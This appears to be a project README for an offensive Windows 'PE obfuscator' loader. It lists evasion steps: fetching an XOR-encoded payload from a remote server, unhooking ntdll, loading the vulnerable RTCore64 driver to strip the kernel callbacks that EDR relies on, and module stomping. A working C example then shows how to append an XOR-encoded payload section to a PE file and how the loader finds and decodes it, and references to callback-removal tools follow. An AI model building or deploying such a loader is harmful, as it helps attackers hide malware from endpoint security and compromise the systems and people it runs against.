PE obfuscator built with evasion in mind. It needs administrator privileges in order to load the RTCore64 driver (RTCore64.sys is the well-known vulnerable MSI Afterburner driver; it appears on vulnerable-driver blocklists, so loading it may itself be blocked or alerted on).
Demo video: PE-Obfuscator.mp4
- Fetch the XOR-encoded PE from a remote server; it is never written to disk as its own file
- Drop the loader executable to disk
- Append a new section with a random name to that loader
- Write the XOR-encoded PE into the newly created section
- Unhook ntdll by mapping a clean copy from \KnownDlls
- Drop RTCore64.sys to disk
- Load/install the RTCore64 driver
- Use RTCore64's kernel read/write primitive to remove the kernel notify callbacks that EDR relies on (see the references below)
- XOR-decode the PE in memory
- Map and run the decoded PE from the added section
- Module stomping: the PE is loaded over a large, legitimately loaded module that is big enough to hold it
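The section-adding step and the matching read-back the loader performs, written out as an added example in C. This is not the tool's own code and it deliberately stops short of the driver, unhooking and stomping steps: it shows only how a new section is appended to a PE32+ file image with the XOR-encoded payload inside it, and how the loader later locates that section by name and decodes it. A single-byte XOR key and the section name used in the test are this example's assumptions (the tool's real encoding is not documented here), and the sample image built by `build_min_pe` is constructed for the example, not a real binary.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
/* PE32+ header layouts declared locally (untouched fields collapsed into padding) so this builds without windows.h. */
#pragma pack(push, 1)
typedef struct { uint16_t e_magic; uint8_t rest[58]; uint32_t e_lfanew; } dos_hdr_t;
typedef struct {                 /* IMAGE_NT_HEADERS64, 264 bytes */
    uint32_t Signature; uint16_t Machine, NumberOfSections; uint8_t fh_rest[12];
    uint16_t SizeOfOptionalHeader, Characteristics;
    uint16_t Magic; uint8_t oh_a[30]; uint32_t SectionAlignment, FileAlignment;
    uint8_t oh_b[16]; uint32_t SizeOfImage, SizeOfHeaders; uint8_t oh_c[176];
} nt_hdr64_t;
typedef struct {                 /* IMAGE_SECTION_HEADER, 40 bytes */
    char Name[8]; uint32_t VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData;
    uint32_t PointerToRelocations, PointerToLinenumbers;
    uint16_t NumberOfRelocations, NumberOfLinenumbers; uint32_t Characteristics;
} sec_hdr_t;
#pragma pack(pop)
static uint32_t align_up(uint32_t v, uint32_t a) { return (v + a - 1) / a * a; }
/* Validate the image and return its NT headers, or NULL for anything that is not a sane PE32+. */
static nt_hdr64_t *nt_headers(uint8_t *img, size_t len) {
    if (len < sizeof(dos_hdr_t) + sizeof(nt_hdr64_t)) return NULL;
    dos_hdr_t *dos = (dos_hdr_t *)img;
    if (dos->e_magic != 0x5A4D || dos->e_lfanew > len - sizeof(nt_hdr64_t)) return NULL;
    nt_hdr64_t *nt = (nt_hdr64_t *)(img + dos->e_lfanew);
    if (nt->Signature != 0x00004550 || nt->Magic != 0x20B) return NULL;
    return (nt->SectionAlignment && nt->FileAlignment) ? nt : NULL;
}
/* The section table follows the 4-byte signature, 20-byte file header and the optional header. */
static sec_hdr_t *section_table(nt_hdr64_t *nt) {
    return (sec_hdr_t *)((uint8_t *)nt + 24 + nt->SizeOfOptionalHeader);
}
/* Obfuscator side: append section `name` to the file image *img and copy `plen` payload bytes
 * into it XOR-encoded with `key` (a single-byte key is this example's assumption). Returns 0,
 * or -1 if the image is malformed or SizeOfHeaders leaves no slot for another section header. */
static int add_section(uint8_t **img, size_t *len, const char *name,
                       const uint8_t *payload, size_t plen, uint8_t key) {
    nt_hdr64_t *nt = nt_headers(*img, *len);
    if (!nt || nt->NumberOfSections == 0 || plen == 0 || plen > 0x7FFFFFFF) return -1;
    sec_hdr_t *secs = section_table(nt);
    uint16_t n = nt->NumberOfSections;
    size_t table_end = (size_t)((uint8_t *)&secs[n + 1] - *img);
    if (table_end > nt->SizeOfHeaders || table_end > *len) return -1;
    sec_hdr_t *last = &secs[n - 1];
    uint32_t span = last->VirtualSize > last->SizeOfRawData ? last->VirtualSize : last->SizeOfRawData;
    uint32_t va  = align_up(last->VirtualAddress + span, nt->SectionAlignment);
    uint32_t raw = align_up((uint32_t)*len, nt->FileAlignment);
    uint32_t rsz = align_up((uint32_t)plen, nt->FileAlignment);
    uint8_t *grown = realloc(*img, (size_t)raw + rsz);
    if (!grown) return -1;
    memset(grown + *len, 0, (size_t)raw + rsz - *len);         /* file-alignment padding */
    for (size_t i = 0; i < plen; i++) grown[raw + i] = payload[i] ^ key;
    *img = grown; *len = (size_t)raw + rsz;
    nt = nt_headers(grown, *len);                             /* pointers are stale after realloc */
    sec_hdr_t *s = &section_table(nt)[n];
    memset(s, 0, sizeof *s);
    memcpy(s->Name, name, strlen(name) < 8 ? strlen(name) : 8);
    s->VirtualSize = (uint32_t)plen; s->VirtualAddress = va; s->SizeOfRawData = rsz; s->PointerToRawData = raw;
    s->Characteristics = 0xC0000040;                          /* INITIALIZED_DATA | READ | WRITE */
    nt->NumberOfSections = n + 1;
    nt->SizeOfImage = align_up(va + (uint32_t)plen, nt->SectionAlignment);
    return 0;
}
/* Loader side: find the section by name, bounds-check it against the file, and return a
 * malloc'd XOR-decoded copy of its VirtualSize bytes (NULL if missing, empty or truncated). */
static uint8_t *extract_section(uint8_t *img, size_t len, const char *name,
                                uint8_t key, size_t *out_len) {
    nt_hdr64_t *nt = nt_headers(img, len);
    if (!nt) return NULL;
    sec_hdr_t *secs = section_table(nt);
    for (uint16_t i = 0; i < nt->NumberOfSections; i++) {
        if ((size_t)((uint8_t *)&secs[i + 1] - img) > len) return NULL;
        sec_hdr_t *s = &secs[i];
        if (strncmp(s->Name, name, 8) != 0) continue;
        if (!s->VirtualSize || s->PointerToRawData > len || s->VirtualSize > len - s->PointerToRawData) return NULL;
        uint8_t *out = malloc(s->VirtualSize);
        if (!out) return NULL;
        for (uint32_t j = 0; j < s->VirtualSize; j++) out[j] = img[s->PointerToRawData + j] ^ key;
        *out_len = s->VirtualSize;
        return out;
    }
    return NULL;
}
/* Constructed sample: 0x400-byte PE32+ skeleton (headers + one .text section), not runnable,
 * just enough structure to exercise the functions above. */
static uint8_t *build_min_pe(size_t *len) {
    *len = 0x400;
    uint8_t *img = calloc(1, *len); if (!img) return NULL;
    dos_hdr_t *dos = (dos_hdr_t *)img; dos->e_magic = 0x5A4D; dos->e_lfanew = 0x40;
    nt_hdr64_t *nt = (nt_hdr64_t *)(img + 0x40);
    nt->Signature = 0x00004550; nt->Machine = 0x8664; nt->NumberOfSections = 1;
    nt->SizeOfOptionalHeader = 240; nt->Magic = 0x20B; nt->SectionAlignment = 0x1000; nt->FileAlignment = 0x200;
    nt->SizeOfHeaders = 0x200; nt->SizeOfImage = 0x2000;
    sec_hdr_t *text = section_table(nt);
    memcpy(text->Name, ".text", 5);
    text->VirtualSize = 0x100; text->VirtualAddress = 0x1000; text->SizeOfRawData = 0x200; text->PointerToRawData = 0x200;
    text->Characteristics = 0x60000020;                       /* CODE | EXECUTE | READ */
    return img;
}
```

Two points a practitioner should keep in mind: the new header only fits if the padding after the existing section table (up to `SizeOfHeaders`) has a free 40-byte slot, which is why `add_section` refuses rather than overwriting the first section's raw data, and both `SizeOfImage` and the new section's `VirtualAddress` must respect `SectionAlignment`, otherwise the Windows loader rejects the file before any of the later steps run.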
https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
https://github.com/br-sn/CheekyBlinder
https://github.com/lawiet47/STFUEDR
https://papers.vx-underground.org/papers/Windows/Infection/2015-03-06%20-%20PE%20Infection%20-%20Add%20a%20PE%20section%20-%20with%20code.txt